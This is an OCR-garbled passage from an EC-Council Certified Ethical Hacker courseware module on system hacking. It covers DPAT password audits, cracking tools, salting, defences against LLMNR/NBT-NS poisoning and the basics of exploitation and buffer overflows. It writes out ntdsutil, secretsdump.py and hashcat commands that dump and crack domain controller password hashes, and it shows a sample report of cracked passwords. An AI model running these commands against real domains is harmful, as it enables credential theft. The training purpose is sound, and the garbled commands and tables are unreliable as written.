‘Unique Passwords Discovered Through Cracking

730 718 36 26

|

:

|

Percent of Passwords Cracked Percent of Unique— Passwords Cracked Members of Domain Admins” group "Domain Admins” Passwords Cracked = snot Admins”Tae Passwords Cracked 2 “Enterprise

nq

| History

‘Zodiak-Taurus | Zodiak-Pisces

Unique Password Hashes

69300

=]

History 3 |New Jo Busctall’) Back@Hy Faois

Description Password Hashes

Details

LM Hashes (Non-blank)

226 Unique LM Hashes (Non-blank) 6 Passwords Only Cracked via LM Hash >| Unique LM Hashes CrackedWhere NT Hash was Not —— oe

| Busctall? [Bick _[Sprngiois

Denails Details Details Details

Top

vord Use Stats

Password Reuse Stats

Fall2019

Password History

[Proven33 | Pilipin46 [Romans 825 | Pilipinas4.15 [Jovem 29.1 | Toba 316

=

ls

Details

Details

Ttps//athub com

Password Cracking Using Domain Password Audit Tool (DPAT) Source: https://github.com

DPAT is a Python script that generates password use statistics from password hashes dumped from a domain controller (DC) and a password crack file such as hashcat.pot generated using the hashcat tool during password cracking. It also generates an HTML report with clickable links. An attacker can open each link and analyze usernames, current passwords, and other password statistics. Initially, an attacker dumps LM and NT hash files from the DC using the compromised admin privileges, following which the attacker cracks those LM hashes and loads them into the password list file using DPAT. Steps to Crack Passwords Using DPAT =

Step 1: Run the following command to dump the password hashes from the domain controller (DC). This requires sufficient space in the C drive to store the output. ntdsutil

=

"ac

in

ntds"

"ifm"

"cr

fu

c:\temp"

q

Step 2: The dump contains two files, Active Directory\ntds.dit and registry\SYSTEM. Now, convert the output file format to the format accepted by the DPAT tool using the Python script secretsdump.py: secretsdump.py -system Directory/ntds.dit" LOCAL

registry/SYSTEM -outputfile users

-ntds

"Active

This script stores the output file in the users .ntds format.

-history > This flag can be included in the above command to view the password history in the report. Module 06 Page 634

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

Step 3: Create a password crack file in the format supported by the DPAT tool. The DPAT tool supports the file formats of both hashcat and John the Ripper tools. Run the following command to crack LM hashes of users .ntds in the hashcat.pot format: ./hashcat.bin

-m

3000

-a

3

users.ntds

-1

?a

217127127121271271

—-

increment

To crack LM hashes using John the Ripper, run the following command: john

=

--format=LM

Step 4: Now, run available options.

users.ntds

the

@parrc #./dpat.py -h lusage: dpat.py [-h] -n NTDSFILE [-g [GROUPLISTS

DPAT

script with

-h

or

-c CRACKFILE [-o OUTPUTFILE]

...]]

[-m]

--help

arguments

[-d REPORTDIRECTORY]

to view

all the

[-w] [-s]

This script will perform a domain password audit based on an extracted NTDS file and password cracking output such as Hashcat optional

arguments:

-h, --help n NTDSFILE,

show this help message and exit --ntdsfile NTDSFILE NTDS file name (output from SecretsDump. py) -c CRACKFILE, --crackfile CRACKFILE Password Cracking output in the default form output by Hashcat, such as hashcat.potfile 0 OUTPUTFILE, --outputfile OUTPUTFILE The name of the HTML report output file, defaults to DomainPasswordAuditReport .html d REPORTDIRECTORY, --reportdirectory REPORTDIRECTORY Folder containing the output HTML files, defaults to DPAT Report -w, --writedb Write the SQLite database info to disk for offline inspection instead of just in memory. Filename will be "pass audit.db" , --Sanitize Sanitize the report by partially redacting passwords and hashes. Prepends -g [GROUPLISTS

...],

the report directory with "Sanitized - " --grouplists [GROUPLISTS ...]

The name of one or multiple files that contain lists of usernames in particular groups. The group names will be taken from the file name itself. The

username

list

must

be

in

the

same

format

as

found

in

the

NTDS

e

such

as some.ad.domain.com\username or it can be in the format output by using the PowerView Get-NetGroupMember function. Example: -g "Domain Admins. txt"

Figure 6.26: Screenshot of the dpat.py script running with the -h option =

Step 5: Next, execute the DPAT script dpat.py with users.ntds as inputs. dpat.py

-n

customer.ntds

-c

and hashcat.pot

hashcat.pot

-n > Represents hashes extracted from the domain controller (DC) -c > List of cracked passwords generated using the hashcat tool As shown in the screenshot, the output of the above command clickable options, which can be opened in the default browser.

Module 06 Page 635

is an HTML report with

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Count 88803 $8023 69300 68521 78.0 778 36 26 8 6 227 226 6

Exam 312-50 Certified Ethical Hacker

Description More Info Password Hashes Details Unique Password Hashes Passwords Discovered Through Cracking Unique Passwords Discovered Through Cracking Percent of Passwords Cracked Details Percent of Unique Passwords Cracked Details ‘Members of "Domain Admins” group Details "Domain Admins” Passwords Cracked Details Members of "Enterprise Admins" group Details "Enterprise Admins” Passwords Cracked Details LM Hashes (Non-blank) Unique LM Hashes (Non-blank) Passwords Only Cracked via LM Hash Details Unique LM Hashes Cracked Where NT Hash was Not Cracked Password Length Stats Details Top Password Use Stats Details Password Reuse Stats Details Password History

Details

Figure 6.27: Screenshot of the DPAT report in an HTML format

=

Step 6: Now, click on the Details option to view more information about different passwords. For example, click on the Details option next to Password History to view the history of previously used passwords, as shown in the screenshot.

Username |Current Password| Carrie PringlesSalt! Curly Baseball77 Darin Black"Hills | Larry Fall2019 Mo dpat Fall2019 pope Proverbs3:5 _|

History0 | 'EatPringles Baseball76 | Black®Hills | Summer2019 | Zodiak-Cancer

History1 |

History2 History 3 | History 4 Iluv my kids! | New Job! Baseball75 | Baseball74 | Baseball73 | Baseball72 BlackSHills | Black#Hills | Black@Hills | Black!Hills Spring2019 Fall2018 | Spring2018 Zodiak-Taurus | Zodiak-Pisces

Philippians 4:6 | Romans 8:28 | Philippians 4:13 | Jeremiah 29:11] John 3:16

Figure 6.28: Screenshot of the password history in the DPAT report

Module 06 Page 636

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking

CEH

Password-Cracking Tools: LOphtCrack and ophcrack LophtCrack

|

LOphtCrackis a tool designed to audit x\-words and recover epplications

Ls

ophcrack

PP!

ophcrack is a Windows password cracker based | onrainbow tables. It comes with a Graphical User Interface and runs on multiple platforms

»nobavoeOoAa

‘ttes//atan com

ce

‘ete fopherock sourceforge net

Password-Cracking Tools RainbowCrack

| rainbowtables.|t uses a time-memory

somes nt of DOSSD067 cde eRe

https://www.openwall.com

tradeoff algorithmto crack hashes

1 rantoncrck Fe Edt View Ranbow Tile tip Hash Plane Er arctnarcaesaricsad7ct88cd (i stastnareoessb7aesoTeoe0890 [1 stasetnaesess17ies9s7e0e089-0

=

John the Ripper

RainbowCrack cracks hashes with

Planeta Hox

a

x

hashcat ttps://hasheat.net

Comment Aerator const Defetecout

y

ito

&

THC-Hydra

[eq]

Medusa

fe

=o]

Til foroject ranbowcrock com

htps//githab.com

ihttp://foofus.net

Secure Shell Bruteforcer

‘ttps://aithub.com

Password-Cracking Tools Password-cracking tools allow you to reset unknown or lost Windows local administrator, domain administrator, and other user account passwords. In the case of forgotten passwords, it even allows users instant access to their locked computer without reinstalling Windows. Attackers can use password-cracking tools to crack the passwords of the target system.

Module 06 Page 637

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

Some password-cracking tools are listed as follows.

=

LOphtCrack Source: https://gitlab.com LOphtCrack is a tool designed to audit passwords and recover applications. It recovers lost Microsoft Windows passwords with the help of a dictionary, hybrid, rainbow table, and brute-force attacks, and it also checks the strength of the password. As shown

in the screenshot,

attackers use LOphtCrack to crack the password

target to gain access to the system. SF LophtCrack 7 - v7.2.0 Win64 [Unnamed Session]

of the

°

SEAE7DFAO7sDAGEEAAEFiFAAZBBDEOTE ocnese3908F7975F2A02007573B09697 a2pn0p252A47sreascorszi7spsasesaF 929 7S4sB519016241NzaF72¢60904rF

Figure 6.29: Screenshot of LOphtCrack

Module 06 Page 638

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

ophcrack

Source: http://ophcrack.sourceforge.net ophcrack is a Windows password-cracking tool that uses rainbow tables for cracking passwords. It comes with a graphical user interface (GUI) and runs on different OSs such as Windows, Linux/UNIX, etc. As shown in the screenshot, attackers use ophcrack to perform brute-force attacks and crack password hashes of the target system. -

@ opherack

yveoe”d Tables Crack Help Exit

aLoad

6 Delete

&Save

Progress

Statistics

Preferences

User ‘Administrator Guest DefaultAccount ‘Admin Martin Jason Shiela

LM Hash

NT Hash 31D6CFEODI6A... 31d6cfeOd162e8... 31d6cfedd1 6208... 9293794585188... SEBETDFAO7AD... 20200252A479F.. 08694880579...

Table

Status

Preload

LM Pwd 1

LM Pwd 2

NT Pwd

Progress

inactive

100% iM

@ table2

inactive

100% ry RAM

@ tables Preload:

done

inactive inactive inactive

x

Lod About

Y @ Vista free

@ tabled @ tablet

ao

100% in RAM 100% in RAM 100% in RM Brute force:

cc! done

Pwd found:

67

| Time elapsed:

Oh Sm 425

J

Figure 6.30: Screenshot of ophcrack

Module06 Page 639

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

RainbowCrack Source: http://project-rainbowcrack.com RainbowCrack cracks hashes with rainbow tables, using a time-memory trade-off algorithm. A traditional brute-force cracker cracks hash in a manner that is different from that followed by a time—memory-tradeoff hash cracker. The brute-force hash cracker tries all possible plaintexts one after the other during cracking. In contrast, RainbowCrack pre-computes all the possible plaintext hash pairs in the selected hash algorithm, charset, and plaintext length in advance and stores them in a “rainbow table” file. It may take a long time to pre-compute the tables, but once the pre-computation is finished, it is possible to easily and quickly crack the ciphertext in the rainbow tables. As shown in the screenshot, attackers use RainbowCrack to crack the password hashes of the target system. 8 RainbowCrack File

Edit

View

RainbowTable

a

x

Help

Hash

Plaintext

Plaintext in Hex

3id6cfe0d16ae931b73c59d7e0c089c0

Comment Administrator

}1 d6cfe0d16ae931b73c59d7e0c089c0:

Guest

© 31d6cfe0d16ae931b73c59d7e0c089c0

DefaultAccount

92937945b51881434 1de3f726500d4fF



Admin.

Sebe7dfal74da8ee8aeflfaa2bbde876

apple

6170706c65

Martin

}d20d252a479H485cdfSe171d93985bf

qwerty

717765727479

Jason

test

74657374

Shiela

I) Ocb69488051797b!2a82807973b89537

«

Messages plaintext of 242025224794 85cdfSe171d93985bf is qwerty statistics

plaintext found: total time time of chain traverse time of alarm check: time of disk read:

30f4 11.058 411s 677s 064s

hash & reduce calculation of chain traverse: 11510400 hash & reduce calculation of alarm check: 34352770

number of alarm: 55343 performance of chain traverse: 2.80 million/s performance of alarm check: 5.08 million/s

Figure 6.31: Screenshot of RainbowCrack

Some password-cracking tools are listed as follows: John the Ripper (https://www.openwall.com)

hashcat (https://hashcat.net) THC-Hydra (https://github.com)

Medusa (http://foofus.net) Secure Shell Bruteforcer (https://github.com)

Module 06 Page 640

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Password Salting

CE H

‘@

Password salting is a technique where a random string of characters are added to the password before calculating their hashes

©

Advantage: Salting makes it more difficult to reverse the hashes and defeat pre-computed hash attacks

Alice:root:b4ef21{3ba4303ce24a83fe0317608de02bf38d)

«---

Same password but different hashes due to

Bob:root:a9c4fa:3282abd0308323ef0349dc7232c349ac Cecil:root:209be1 fa483b303c23af34761de02be038fde08|

different salts



Note: Windows password hashes are not salted

Password Salting Password salting is a technique in which random strings of characters are added to a password before calculating the hashes. This makes it more difficult to reverse the hashes and helps in defeating pre-computed hash attacks. The longer the random string, the harder it becomes to break or crack the password. The random string of characters should be a combination of alphanumeric characters. In cryptography, a “salt” consists of random data bits used as an input to a one-way function, the other being a password. Instead of passwords, the output of the one-way function can be stored and used to authenticate users. A salt combines with a password by a key derivation function to generate a key for use with a cipher or other cryptographic algorithm. This technique generates different hashes for the same password, which renders password cracking

difficult.

Alice:root:b4ef2143ba4303ce24a83fe0317608de02bf38d } Computer Configuration > Administrative Templates > Network > DNS Client

@ Inthe DNS client, double-click on Turn off multicast name resolution © Select the Enabled radio button and then click OK

a

Open the Control Panel and navigate to Network and Internet >

Network and Sharing Center and click on Change adapter settings option present on the right side Right-click on the ° adapter and click

network | “**"*!1P/? Sear

Properties, select TCP/IPv4.

and then click Properties @ Under the General tab, go to Advanced > WINS @

From the NetBIOS setting

options, check “Disable

*

Penne 06 ms

6 te nee oa

TGabewased

t

a

Bene yrestsiae ios sera ete

pot uvess.

NetBIOS over TCP/IP”

radio button and click OK

How to Defend against LLMNR/NBT-NS

Poisoning

The easiest way to prevent a system from being attacked by a perpetrator is to disable both the LMNR and NBT-NS services in the Windows OS. Attackers employ these services to obtain user credentials and gain unauthorized access to the user’s system. Steps to disable LLMNR/NBT-NS in any version of Windows: =

Disabling LMBNR

o

Open the Local Group Policy Editor.

©

Navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client.

o

Inthe DNS Client, double-click Turn off multicast name resolution.

o

Select the Enabled radio button and then click OK.

Module 06 Page 645

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking

& Tum off multicast name resolution

o

EE] Tum off multicast name resolution

ONot Configured

pote Sette

Comment:

Supported on: Options:

x

pt least Windows Vista Help: Specifies that link local multicast name resolution (LLMNR) is disabled on client computers.

'

LLMNNR is a secondary name resolution protocol. With LLMNR, queries are sent using multicast over a local network link on a single subnet from a client computer to another client computer on the same subnet that also has LLMNR enabled. LLMNR does not require a DNS server or DNS client configuration, and provides name resolution in scenarios in which conventional DNS name resolution is not possible. If you enable this policy setting, LLMINR will be disabled on all available network adapters on the client computer. If you disable this policy setting, or you do not configure this policy setting, LLMNR will be enabled on all available network adapters.

Figure 6.33: Disabling LMBNR in Windows

=

Disabling NBT-NS o

Open the Control Panel, navigate to Network and Internet > Network and Sharing Center, and click on the Change adapter settings option on the right-hand side.

o

Right-click on the network adapter and then click Properties, select TCP/IPv4, and then click Properties.

o

Under the General tab, go to Advanced > WINS.

o

From the NetBIOS setting options, check the “Disable NetBIOS over TCP/IP” radio button and click OK.

Module 06 Page 646

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Advanced TCP/IP Settings

IP Settings DNS

x

WINS

WINS addresses, in order of use:

IF LMHOSTS lookup is enabled, it applies to all connections for which TCP/IP is enabled. @ Enable LMHOSTS lookup

Import LMHOSTS...

NetBIOS setting ObDefault:

Use NetBIOS setting from the DHCP server. If staticIP address

is usedor the DHCP server does not provide NetBIOS setting, enable NetBIOS over TCP/IP.

O

Enable NetBIOS

TCP/IP

a Figure 6.34: Disabling NBT-NS in Windows

Some additional countermeasures to defend against LLMNR/NBT-NS poisoning are as follows: Control LLMNR, NBT-NS, and mDNS traffic using host-based security tools.

Implement SMB signing to prevent relay attacks. Deploy an LLMNR/NBT-NS spoofing monitoring tool. Monitor the host on UDP ports 5355 and 137 for LLMNR and NBT-NS traffic. Monitor

attacks.

Monitor

specific event

any

IDs such

changes

as 4697

made

to

and

7045,

the

DWORD

HKLM\Software\Policies\Microsoft\Windows

Module 06 Page 647

which

can

be indicators

registry

of relay

located

in

NT\DNSClient.

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Tools to Detect LLMNR/NBT-NS Poisoning Vindicate @

Vindicate is an LLMNR/NBNS/mDNS Spoofing Detection

spoofing

Toolkit to detect name

service

Respounder

© Respounder helps security professionalsto detect rogue hosts running responder on public Wi-Fi networks ‘etes:/fathub.com Al RightsReserved. Reproduction

Tools to Detect LLMNR/NBT-NS

Poisoning

Network administrators and cybersecurity professionals use tools such responded, and Respounder to detect LLMNR/NBT-NS poisoning attacks. =

as Vindicate,

got-

Vindicate

Source: https://github.com Vindicate is an LLMNR/NBNS/mDNS spoofing detection toolkit for network administrators. Security professionals use this tool to detect name service spoofing. This tool helps them to quickly detect and isolate attackers on their network. It is designed to detect the use of hacking tools such as Responder, Inveigh, NBNSpoof, and Metasploit’s LLMNR, NBNS, and mDNS spoofers while avoiding false positives. It exploits the Windows event log for quick integration with an Active Directory network.

Module 06 Page 648

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Figure 6.35: Screenshot showing the output of Vindicate =

Respounder

Source: https://github.com Respounder detects the presence of a responder in the network. Security professionals use this tool to identify compromised machines before hackers exploit password hashes. This tool also helps security professionals to detect rogue hosts running responder on public Wi-Fi networks, e.g., in airports and cafes and avoid joining such networks. attacker@parrot

$./respounder

/

1 ] ) (

[etho] Sending attacker@parrot

|// RESPOUNDER //|

,

probe

from

:

10.10.1.13...

responder

detected

at

10.10.1.9

Figure 6.36: Screenshot showing output of Respounder

Module 06 Page 649

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

got-responded

Source: https://github.com got-responded helps security professionals to check for LLMNR/NBT-NS spoofing. This tool starts in the default mode and checks for both LLMNR and NBT-NS spoofing but

does not send fake SMB credentials.

Author:

@_w_m_

:49

49

INFO INFO

sending

:49

5

INFO

07-11

04:55

verification

INFO

using

detectNBNSSpoof:

Spoofing

Going

sending

04:55 INFO 10.10.10.11

started

detectNBNSSpoof:

INFO

5 INFO

-10.11,

Detection

a

Got

verification

SRVDBJOYZ

detected

silent

Got

for

response

after

2s

360s,

don't

want

Got

a response

detectNBNSSpoof:

Got

verification

Spoofing

using

detected

SRVFILE-FSUJ using

by ip 10.10.10.11!,

detectNBNSSpoof: verification

for

RECEPTION-JNPO

for

to

10.1

from

10.

going dark for

360s

WORKSTATION-TF74

from

spam

after

using

by ip 10.10.10.11!,

SRVDBJOYZ

from

the

responder

10s

RECEPTION-JNPO

going

dark

for

fro

300s

Figure 6.37: Screenshot showing the output of got-responded

Module 06 Page 650

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Vulnerability Exploitation ‘@

CE H

Vulnerability exploitation involves the execution of multiple complex, interrelated steps to gain access to

a remote system. The steps involved are as follows:

Ea

©oeoe0ood

@

identify the vulnerability

Determine the risk associated with the vulnerability Determine the capability of the vulnerability es

Develop the exploit

aKQ

Select the method for delivering— local or remote

Generate and deliver the payload Gain remote access

Copyright © by

Vulnerability Exploitation Vulnerability exploitation involves the execution of multiple complex, interrelated steps to gain access to a remote system. Attackers can perform exploitation only after discovering vulnerabilities in that target system. Attackers use discovered vulnerabilities to develop exploits and deliver and execute the exploits on the remote system. Steps involved in exploiting vulnerabilities: 1.

Identify the Vulnerability Attackers identify the vulnerabilities that exist in the target system using various techniques discussed in the previous modules. These techniques include footprinting and reconnaissance, scanning, enumeration, and vulnerability analysis. After identifying the OSs used and vulnerable services running on the target system, attackers also use various online exploit sites such as Exploit Database (https://www.exploit-db.com) and Packet Storm (https://packetstormsecurity.com) to detect vulnerabilities in underlying OS and applications.

2.

Determine the Risk Associated with the Vulnerability After identifying a vulnerability, attackers determine the risk associated with the vulnerability, i.e., whether exploitation of this vulnerability sustains the security

measures on the target system.

3.

Determine the Capability of the Vulnerability If the risk is low, attackers can determine the capability of exploiting this vulnerability to

gain remote access to the target system.

Module 06 Page 651

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking 4.

Exam 312-50 Certified Ethical Hacker

Develop the Exploit After determining the capability of the vulnerability, attackers use exploits from online exploit sites such as Exploit Database (https://www.exploit-db.com), or develop their own exploits using exploitation tools such as Metasploit.

5.

Select the Method for Delivering — Local or Remote Attackers perform remote exploitation over a network to exploit vulnerability existing in the remote system to gain shell access. If attackers have prior access to the system, they perform local exploitation to escalate privileges or execute applications in the target

system. 6.

Generate and Deliver the Payload Attackers, as part of exploitation, generate or select malicious payloads using tools such as Metasploit and deliver it to the remote system either using social engineering or through a network. Attackers inject malicious shellcode in the payloads, which, when executed, establishes a remote shell to the target system.

7.

Gain Remote Access

After generating the payload, attackers run the exploit to gain remote shell access to the target system. Now, attackers can run various malicious commands on the remote shell and control the system.

Module 06 Page 652

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Exploit Sites

|

‘eps fiw. S162. com

ete: /fulio.com

oe

Bs

CVE res reso peat re ton eee

er

‘Search Results

Exploit Sites Attackers can use various exploit sites such as Exploit Database, VulDB, etc. to discover vulnerabilities and download or develop exploits to perform remote exploitation on the target system. These sites include details of the latest vulnerabilities and exploits.

=

Exploit Database Source: https://www.exploit-db.com Exploit Database includes details of the latest vulnerabilities present in various OSs, devices, applications, etc. Attackers can search Exploit Database to discover vulnerabilities in that target system, download the exploits from the database, and use exploitation tools such as Metasploit to gain remote access.

Module 06 Page 653

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking

6

verified

Has App

10

=

Bypass)

oat

05

~

Buffer Overflow (DoS)

is

™ sa

cl me

Figure 6.38: Screenshot of Exploit Database

=

VulDB

Source: https://vuldb.com VuIDB includes details of the latest vulnerabilities and exploits, rated based on the highest exploitation probability. Attackers can search the VulDB to identify vulnerabilities and exploit them or even fully automate the exploitation.

HOME

ENTRIES

RISK

fase 017112022

THREAT

SEARCH = SUPPORT

Temp: ~ Vulnerability

EEE MIRE

LOGIN

Prod: Exp: = Rem: = Connection Manager Privilege SEE

icros t windows Remote access Connection Manager Privilege EEE onnection Manager Privilege EEE

ovnvvasz

dows Remat

01/05/20:

Secure Remote Access Base Software cross-site

1271472021 ranaya0a1 1171772021

cml

ZEN

EEN WIRED

wicrost windows Remote Access Privilege Escalation = Windows Remote Access Connection Manager Privilege SEE Escalator HREM MIREIMI.zon0 Remote Ac es Pus Server Password Reset password = Remote Ac oho Remote Ac

ti

=a =

no ManageEngine Rem Plus random values = Engine Remote Access Pls resetPWOxmi hard-coded EEE

Figure 6.39: Screenshot of VulDB

Module 06 Page 654

Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

Vulners Source: https://vulners.com Vulners.com is a security database containing descriptions for a large amount of software vulnerabilities in a machine-readable format. Cross-references between bulletins and continuously updating databases helps one keep abreast of the latest security threats. DATABASE

PRODUCTS +

PRICING

STATS

BLOG

DOCS

CONTACTS

GET STARTED

x

bulletinFamily:unix order:published

@ vaice) G security news) ©] exper epdates) GS wioysreviw) 3

Linux

(@ wushouny)

kernel vulnerabilities

1022-04-01

(Q umurvawrsiice) (G scarnerspl cvss 7.2

00:00:00

5

#

cvsss 7.0

It was discovered that the VFIO PCI driverin the Linux kernel did not properly handle attempts to access disabled memory spaces. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-12888) Mathy Vanhoef discovered that t.

eo Linux kernel (Intel |OTG) vulnerabilities

808

ovss 7.8

B® cvss3 8.4

Nick Gregory discovered that the Linux kernel incorrectly handled network offload functionality. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2022-25636) Enrico Barberis, Pietro Frigo, Marius Muench.

©: 8 ©e

[SECURITY] [DLA 2967-1] wireshark security update 1022-03-31 21:42:51

ovss 7. © °

B

©

@ support

Figure 6.40: Screenshot of Vulners

Module 06 Page 655

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking =

MITRE CVE

Source: https://www.cve.org MITRE maintains a CVE database that contains details of the latest vulnerabilities. Attackers can search MITRE CVE to discover vulnerabilities that exist in the target

system.

commen Wuinerabilties and Exposures

Search CVE List

Download CVE

Data Feeds

Request CVE IDs

CVE Entry

TOTAL CVE Entries: 119927

Search Results

[There are 10111 CVE entries that match your search.

Name

Description

CVE-2019-9956

—_In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.

CVE-2019-9928

GStreamer

CVE-2019-9895 CVE

9810

CVE-2019-9773

before

1.16.0

has a heap-based

buffer overflow

in the RTSP

connection

crafted response from a server, potentially allowing remote code execution.

parser via a

_In PUTTY versions before 0.71 on Unix, a remotely triggerable buffer overflow exists in any kind of server-to-client forwarding. _ Incorrect alias information in IonMonkey JIT compiler for Array.prototype.slice method may lead to missing bounds check and a buffer overflow. This vulnerability affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and Thunderbird < 60.6.1. An issue was discovered in GNU LibreDWG 0.7 and 0.7.1645. There is a heap-based buffer

5

Figure 6.41: Screenshot of MITRE CVE

Module 06 Page 656

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Buffer Overflow

CE H

@ Abuffer is an area of adjacent memory locations allocated to a program or application to handle its runtime data ‘©

Buffer overflow or overrun is a common vulnerability in an applications or programs that accepts more data than

the allocated buffer

© This vulnerability allows the application to exceed the buffer while writing data to the buffer and overwrite neighboring memory locations @ Attackers exploit buffer overflow vulnerability to inject malicious code into the buffer to damage files, modify program data, access critical information, escalate privileges, gain shell access, etc. Why Are Programs and Applications Vulnerable to Buffer Overflows?

© Lackof boundary checking

© Failingto set proper filteringand validation principles

© Using older versions of programming languages

© Executing code present in the stack segment

© Using unsafe and vulnerable functions

© Impropermemory allocation

© Lack of good programming practices

© Insufficientinputsanitization

Buffer Overflow A buffer is an area of adjacent memory locations allocated to a program or application to handle its runtime data. Buffer overflow or overrun is a common vulnerability in applications or programs that accept more data than the allocated buffer. This vulnerability allows the application to exceed the buffer while writing data to the buffer and overwrite neighboring memory locations. Furthermore, this vulnerability leads to erratic system behavior, system crash, memory access errors, etc. Attackers exploit a buffer overflow vulnerability to inject malicious code into the buffer to damage files, modify program data, access critical information, escalate privileges, gain shell access, and so on. Why Are Programs and Applications Vulnerable to Buffer Overflows? =

Boundary checks are not performed fully, or, in most cases, entirely skipped

=

Applications that use older versions of programming languages involve several vulnerabilities

=

Programs that use unsafe and vulnerable functions fail to validate the buffer size

=

Programs and applications that do not adhere to good programming practices

=

Programmers that fail to set proper filtering and validation principles in the applications

=

Systems that execute code present in the stack segment are vulnerable to buffer

=

Improper memory allocation and insufficient input sanitization in the application lead to buffer overflow attacks

=

Application programs that use pointers for accessing heap memory result in buffer

overflows

overflows

Module 06 Page 657

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Types of Buffer Overflow: Stack-Based Buffer Overflow |@

CE H

Astack is used for static memory allocation and stores the variables in “Last-in First-out” (LIFO) order There are two stack operations: PUSH stores the data onto the stack and POP removes data from the stack

ih fan application is vulnerableto stack-based buffer overflow, then attackers take control of the EIP register to replace tl he

@

return address of the function with the malicious code that allows them to gain shell access to the target system Bottom of Stack

Bottom of Stack

Data on stack Segment SP

EndofStack

Bottom of Stack

Data on Stack Segment | |ABytes

Dataon stack | semedsta Segment oerten

Return Address || @Bytes | New Return Address.»

ayes,

MoreDataon Stack Segment

SP“>

End of Stack

‘ANormal Stack

ESP (Extended Stack Pointer) > Stack Frame

‘Stack when Attacker calls a function

| new nBytes+ data SP->

Overwrtten Data onstack Segment

Buffer Space

v

Maus bsyaycde

End of Stack

EBP (Extended Base Pointer)

Stack when attacker overflows buffer in function

EP

yore

tosmash the stack

Types of Buffer Overflow: Heap-Based Buffer Overflow ‘@

1n Pointer)> Return Address

CEH

Heap memory is dynamically allocated at runtime during the execution of the program and it stores program

data

|@ Heap-based overflow occurs when a block of memory is allocated to a heap, and data is written without any bounds checking @ This vulnerability leads to overwriting dynamic object pointers, heap headers, heap -based data, virtual function table, etc. |@ Attackers exploit heap-based buffer overflow to take control of the program’s execution. Unlike stack overflows, heap overflows are inconsistent and have different exploitation techniques

input=malloc(20);

} input=malloc(20};

Heap:

E output=malloc(20);

Before Overflow Al Rights Reserved. Reproduction i Strictly Prohibited

Types of Buffer Overflow There are two types of buffer overflow, namely the stack-based based buffer overflow. =

buffer overflow and heap-

Stack-Based Buffer Overflow In most applications, a stack is used for static memory allocation. Contiguous blocks of memory are allocated for a stack to store temporary variables created by a function.

Module 06 Page 658

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

The stack stores the variables in “Last-in First-out” (LIFO) order. Whenever a function is called, the required memory for storing the variables is declared on the stack, and when the function returns, the memory is automatically deallocated. There are two stack operations, namely, PUSH, which stores data onto the stack, and POP, which removes data from the stack. Stack memory includes five types of registers: o

BP: Extended Base Pointer (EBP), also known the first data element stored onto the stack

as StackBase, stores the address of

o

